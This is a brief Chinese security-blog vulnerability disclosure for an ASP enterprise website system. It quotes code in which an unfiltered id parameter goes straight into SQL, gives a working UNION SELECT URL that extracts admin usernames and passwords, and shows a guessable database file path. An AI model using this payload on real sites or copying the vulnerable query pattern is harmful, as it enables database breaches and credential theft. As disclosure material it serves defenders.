【Asp】918企业营销网站展示系统注入+爆数据库漏洞 - 脚本漏洞

  • A+
所属分类:lcx

news_show.asp

news_show.asp
id=request.QueryString("id")
k=request.QueryString("k")
%>
      
                        set rs3=server.CreateObject("adodb.recordset")
                        sql3="select * from hlf_news where id="&id
                        rs3.open sql3,conn,1,1
                        if not rs3.eof then
%>

过滤问题:

http://127.0.0.1/news_show.asp?id=106 union select 1,admin,3,4,password,6 from hlf_admin

再看后台的conn.asp:

conn.asp

db="../databases/##hongquan.mdb" '数据库文件位置
'on error resume next      '不知道为什么给注释了
set conn=Server.Createobject("adodb.connection") 
conn.open"Provider=Microsoft.Jet.OLEDB.4.0;"&"Data Source=" & Server.MapPath(db)
%>

国际问题了。

文章来源于lcx.cc:【Asp】918企业营销网站展示系统注入+爆数据库漏洞 - 脚本漏洞

相关推荐: 【转载】我的祖国 - 中国现实,相当犀利的文笔

    “我的祖国已经越来越显现出浮躁,狂热,悲哀,迷茫的气息。社会在财富的迅速积累下,糜烂与堕落,国富民衰的迹象越来越明显,各级政府处处想着与民争利,社会两极分化异常严重。富人们肆无忌惮的忘乎所以,穷人们走投无路般的苟延残喘,青年人的思想在社会的约束中扼杀,…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: